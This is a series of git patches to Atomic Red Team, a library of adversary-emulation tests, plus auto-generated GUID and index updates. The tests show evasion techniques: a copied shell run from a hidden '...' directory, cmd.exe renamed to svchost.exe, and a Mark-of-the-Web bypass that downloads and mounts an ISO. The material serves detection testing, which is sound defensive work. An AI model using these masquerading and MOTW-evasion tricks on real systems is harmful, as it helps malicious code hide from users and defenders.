tests for T1036.005 One Windows and one Linux/macOS --- atomics/T1036.005/T1036.005.yaml | 51 ++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 atomics/T1036.005/T1036.005.yaml diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml new file mode 100644 index 00000000..05a1bdd7 --- /dev/null +++ b/atomics/T1036.005/T1036.005.yaml @@ -0,0 +1,51 @@ +--- +attack_technique: T1036.005 +display_name: 'Masquerading: Match Legitimate Name or Location' + +atomic_tests: +- name: Execute a process from a directory masquerading as the current parent directory. + description: | + Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + + supported_platforms: + - macos + - linux + + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#1 + + executor: + name: sh + elevation_required: false + command: | + mkdir $HOME/... + cp $(which sh) $HOME/... + $HOME/.../sh -c "echo #{test_message}" + cleanup_command: | + rm -f $HOME/.../sh + rmdir $HOME/.../ + +- name: Execute a process masquerading as a legitimate Windows binary + description: | + Create and execute a process masquerading as a legitimate Windows binary + + supported_platforms: + - windows + + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#2 + + executor: + name: command_prompt + elevation_required: false + command: | + copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe + start %PUBLIC%\svchost.exe /C echo "#{test_message}" + cleanup_command: | + del %PUBLIC%\svchost.exe >nul 2>&1 From d3321c6a1f00e3c77b37ddc09e23749791ccbc7d Mon Sep 17 00:00:00 2001 From: Jorge Orchilles <52384511+jorgeorchilles@users.noreply.github.com> Date: Wed, 9 Jun 2021 11:40:30 -0700 Subject: [PATCH 15/84] Create T1553.005 Atomic Test (#1506) * Create T1553.005 * Create T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Updated T1553.005 --- atomics/T1553.005/T1553.005.md | 51 ++++++++++++++++++++++++++++ atomics/T1553.005/T1553.005.yaml | 29 ++++++++++++++++ atomics/T1553.005/src/T1553.005.iso | Bin 0 -> 360448 bytes 3 files changed, 80 insertions(+) create mode 100644 atomics/T1553.005/T1553.005.md create mode 100644 atomics/T1553.005/T1553.005.yaml create mode 100644 atomics/T1553.005/src/T1553.005.iso diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md new file mode 100644 index 00000000..50d47c77 --- /dev/null +++ b/atomics/T1553.005/T1553.005.md @@ -0,0 +1,51 @@ +# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) +
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+ +## Atomic Tests + +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) + + +
+ +## Atomic Test #1 - Mount ISO image +Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| + + +#### Attack Commands: Run with `powershell`! + + +``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` + +#### Cleanup Commands: +``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` + + + +#### Dependencies: Run with `powershell`! +##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +``` +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml new file mode 100644 index 00000000..fe4879b8 --- /dev/null +++ b/atomics/T1553.005/T1553.005.yaml @@ -0,0 +1,29 @@ +attack_technique: T1553.005 +display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass' +atomic_tests: +- name: Mount ISO image + description: | + Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + dependency_executor_name: powershell + dependencies: + - description: | + T1553.005.iso must exist on disk at specified location (#{path_of_iso}) + prereq_command: | + if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + executor: + command: | + Mount-DiskImage -ImagePath "#{path_of_iso}" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" + name: powershell + diff --git a/atomics/T1553.005/src/T1553.005.iso b/atomics/T1553.005/src/T1553.005.iso new file mode 100644 index 0000000000000000000000000000000000000000..5f01ec95159292996ea615bde8feb9af3a411d1b GIT binary patch literal 360448 zcmeI)U5s2+0RZ4L73fj~7pSGJ2p3`nB0HVkwS|^ox}BNrPT8GVW@ZZ|gR)^4tj_L` zovm$+55*S*G3g6vV$=pf9z-HWLc(7#5)FeKo-jQW##k77R{7(fYZYtF(qqQV%H*MUQTR%2h zTR&A8O-4)O#oEqVy*QC;L;;D270Q009C7 z2%IK?cn6o%ch4rH(S#)?Z(lP*8GC%1E)XCBt6y* zOPw4eS=F`pSU2hPw^Ue4fB*pk1m1grV)bxlMg6{bRV__^E-t?w9I1~LlWHY@Q&KGz zwiT07xn8X1$41IAKUuBREBVTJn%Pk*6l+OsYBIe*CZlly_hhA3y0x?PJL#?ct`#Rn z%JovdHaT7#sTGrarCcA$*ONl2mQN<9wvLx-V{vJCTDdk^%$G(>`H_05Qch}>scOEM zO_EwM_Ik8n>@qetT8ec_W+ByS6li*67w$)6wZ3>szaG)zc%oP74<`z^A3)7 z_QUE-_)vWP#QWT0W@Wg1^7YCq$)7gw>VM?7ec@BN+;`T5^>L+Ox9Q`yJHlXR|HeKuCLv3GsadvKaD1@!YwY#;`?%5Z-Q@dYpF3Z%yzS!Pkm<@AbIK=8< zb+{`{!@>ffG7M}7OX|AusQ@PEDPqOcHl zcShX|%}(pt*w5Y=L%1}?N-s^Tr27LgrlB0;g)yeBzWwsApYM-ph_pSq#?o9H#}DnA zkd1$hci0|}*9a$0x^c>ZCLtd-$2L!Fp?v~dBfdRzVLIF$C$|t|JC0%|PP!S=!Ji$% z!F4hHeT?Zu&x`we%0FBC$7Q#dpDARYdh+IPJ(Iq6M~rdO2XBpO8osov)tp`I=F{z? zuUB6D%i1-C?=Sz#Z4V9XuU-Dww?FfXpT2S7vtNFD&*JxXe&XF;Ul|*ZkADuX>k3v| zt;KbXcJGtZ*flqO_w2%KI~(8bV||{fxpl{V3aaso)rwz(b@9Fa&)?fK)#igVujk^~ z=iK<6n2VDhtWDMq=U#X%AMW4w_}^c-_|f)VSKb_t&!ixi_hKP_Q0|Q9wYm5;pN}7z zc1Xh2z0<^0+)GaY?f5Yo@06R4r+}rS*QCvK!hyI=JIlSb?wL2Yt?hs8tz~yS_}w?2 zxFR0!{778dS^86O)!5uUv7v=dMJ=oK-zM82J4;;mnQVi(`O);hrPpz6O{OB9^j6FWKCHv@&dmsFG zJpTE#z*vm`*njEb&%gQbwntvQ{_s;Pwx6FK7YGm_K!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 W2oNAZfB*pk1PBlyK!CspLf~I%UTI4J literal 0 HcmV?d00001 From b74fd6246cf6970c76d13994bf1200a3b510ce46 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 9 Jun 2021 18:40:57 +0000 Subject: [PATCH 16/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index fe4879b8..000674c5 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -2,6 +2,7 @@ attack_technique: T1553.005 display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass' atomic_tests: - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa description: | Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 71c27abf..3e4f1628 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -710,3 +710,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 +002cca30-4778-4891-878a-aaffcfa502fa From 22f3da49600f402eb910a71b6c05977a7e8fb36d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 18:41:04 +0000 Subject: [PATCH 17/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 37 ++++++++++++++++++- atomics/T1553.005/T1553.005.md | 22 +++++++---- 10 files changed, 60 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 9934245a..94952e5e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,